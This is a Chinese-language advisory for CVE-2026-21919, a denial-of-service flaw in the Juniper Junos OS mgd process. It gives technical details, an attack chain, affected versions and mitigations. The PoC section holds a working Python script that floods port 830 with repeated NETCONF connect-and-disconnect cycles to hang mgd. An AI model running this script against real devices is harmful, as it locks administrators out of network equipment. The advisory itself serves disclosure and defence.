CVE-2026-21919 Junos OS管理进程DoS漏洞

漏洞信息

漏洞编号

CVE-2026-21919

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Junos OS, Junos OS Evolved

漏洞概述

Juniper Networks Junos OS和Junos OS Evolved中的管理守护进程存在不正确同步漏洞。具有低权限的网络攻击者可通过快速建立并断开NETCONF会话，触发锁定机制问题，导致mgd进程进入不可用状态。当挂起的进程达到最大数量时，设备管理面将完全拒绝服务，需重启或手动干预恢复。

技术细节

该漏洞的核心在于Juniper Networks Junos OS及Junos OS Evolved中的管理守护进程在处理并发NETCONF会话时存在同步机制缺陷。攻击者仅需具备低权限网络访问能力，即可针对设备的NETCONF服务端口（通常为830）发起攻击。通过脚本快速建立TCP连接并进行NETCONF握手，随后立即断开连接，这种高频的连接与断开操作会触发mgd内部的竞争条件。具体表现为mgd进程在等待文件锁时进入不可用的lockf挂起状态。由于系统对mgd进程的最大运行数量有限制，当所有可用进程均因锁定问题而耗尽时，系统将无法接受新的管理登录请求（包括SSH和HTTPS），导致管理平面完全拒绝服务。此时设备虽可能仍在转发数据，但已无法进行管理操作，必须重启或手动终止僵尸进程才能恢复。

攻击链分析

STEP 1

侦察

攻击者识别目标设备为Juniper Networks运行受影响版本的Junos OS或Junos OS Evolved，并获取低权限账户凭证。

STEP 2

利用

攻击者编写脚本，向目标设备的NETCONF端口（TCP 830）发送大量快速的连接和断开请求。

STEP 3

资源耗尽

由于mgd进程在处理这些请求时存在同步错误，进程会卡在lockf状态并停止响应，逐渐耗尽系统允许的mgd进程上限。

STEP 4

拒绝服务

当所有mgd进程均挂起后，新的管理员无法登录设备（SSH/HTTPS不可用），导致管理平面完全瘫痪。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import paramiko
import time

# Configuration
TARGET_IP = "192.168.1.1"
TARGET_PORT = 830
USERNAME = "lowpriv_user"
PASSWORD = "password"
COUNT = 1000

def exploit():
    print(f"[*] Starting attack against {TARGET_IP}...")
    for i in range(COUNT):
        try:
            # Create a new SSH client for each session
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            
            # Establish NETCONF connection (SSH)
            ssh.connect(TARGET_IP, port=TARGET_PORT, username=USERNAME, password=PASSWORD, timeout=5)
            
            # Immediately close the connection to trigger the race condition
            ssh.close()
            
            print(f"[+] Sent/disconnected session {i+1}/{COUNT}")
            
        except Exception as e:
            print(f"[-] Error on session {i+1}: {e}")
        
        # Small delay to simulate rapid but distinct connections
        # Remove or reduce this delay to increase intensity
        time.sleep(0.01)

    print("[*] Attack finished.")

if __name__ == "__main__":
    exploit()

影响范围

Junos OS 23.4 versions before 23.4R2-S4

Junos OS 24.2 versions before 24.2R2-S1

Junos OS 24.4 versions before 24.4R1-S3, 24.4R2

Junos OS Evolved 23.4 versions before 23.4R2-S5-EVO

Junos OS Evolved 24.2 versions before 24.2R2-S1-EVO

Junos OS Evolved 24.4 versions before 24.4R1-S3-EVO, 24.4R2-EVO

防御指南

临时缓解措施

监控mgd进程状态，若发现大量处于lockf状态的mgd进程，可尝试通过CLI命令'request system process terminate <PID>'或Shell命令'kill -9 <PID>'手动终止这些进程以释放资源。建议配置ACL限制管理平面的访问来源，降低被攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-21919
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-21919
3 Details https://www.cvedetails.com/cve/CVE-2026-21919/
4 VulDB https://vuldb.com/cve/CVE-2026-21919
5 Link https://kb.juniper.net/JSA106019